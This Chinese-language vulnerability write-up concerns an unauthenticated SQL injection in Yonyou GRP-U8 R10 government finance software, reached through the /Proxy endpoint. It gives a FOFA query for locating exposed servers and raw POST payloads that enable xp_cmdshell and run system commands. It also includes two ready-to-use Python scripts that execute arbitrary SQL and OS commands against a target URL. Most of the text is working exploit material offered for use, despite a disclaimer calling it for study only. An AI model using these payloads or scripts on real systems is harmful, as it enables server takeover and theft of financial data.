声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞详情
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
二、漏洞描述
该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
用友 GRP-U8 Proxy 接口存在 SQL 注入漏洞,攻击者通过漏洞可以获取服务器权限。
FOFA:title="GRP-U8" 或 title="用友 GRP-U8 行政事业内控管理软件"
三、利用条件
- 无需登录
四、漏洞POC
POST /Proxy HTTP/1.1
Accept: *
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
Content-Length: 349
Connection: close
//查询数据库版本(MSSQL),并回显
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><P
ARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA>
</PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA><
/PARAM></PARAMS> </R9FUNCTION></R9PACKET>
//查询当前数据库名称
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><P
ARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA>
</PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select db_name()</DATA><
/PARAM></PARAMS> </R9FUNCTION></R9PACKET>
以POST方式发送如下几个Payload,开启 xp_cmdshell 操作,查询到当前数据库名称后,第一个包需要修改当前库名
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">use master</DATA></PARAM></
PARAMS></R9FUNCTION></R9PACKET>
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'show adv
anced options',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM><
/PARAMS></R9FUNCTION></R9PACKET>
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'xp_cmdsh
ell',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM><
/PARAMS></R9FUNCTION></R9PACKET>
//执行dir命令
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "dir"</DAT
A></PARAM></PARAMS></R9FUNCTION></R9PACKET>
上面几个POC大概意思就是开启xp_cmdshell指令并刷新配置
USE master
EXEC sp_configure 'show advanced options',1 //启用xp_cmdshell的高级配置 RECONFIGURE --刷新配置
RECONFIGURE //先执行一次刷新,处理上次的配置
EXEC sp_configure 'xp_cmdshell',1 //打开xp_cmdshell,可以调用SQL系统 之外的命令
RECONFIGURE //刷新配置
五、利用脚本
GRP-U8_SQLinjection_POC
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python poc.py url sql"
sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def poc(url,sql):
url = url + '/Proxy'
print url
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">'+sql+'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
res = requests.post(url,headers=headers,data=data)
res = res.text
result_row = r'<ROW COLUMN1="(.*?)"'
ROW = re.findall(result_row,res,re.S | re.M)
print '查询成功!'
print ROW[0]
if __name__ == "__main__":
poc(sys.argv[1],sys.argv[2])
GRP-U8_SQLinjection_EXP
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python exp.py url cmd"
sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def exp(url,cmd):
url = url+ '/Proxy'
print url
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell \''+cmd+'\'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
res = requests.post(url,headers=headers,data=data)
res = res.text
result_row = r'<ROW output="(.*?)" />'
ROW = re.findall(result_row,res,re.S | re.M)
print '命令执行成功!'
for i in range(len(ROW)):
print ROW[i]
if __name__ == "__main__":
exp(sys.argv[1],sys.argv[2])
六、漏洞代码分析
可参考文章:https://baijiahao.baidu.com/s?id=1681131145841849209&wfr=spider&for=pc
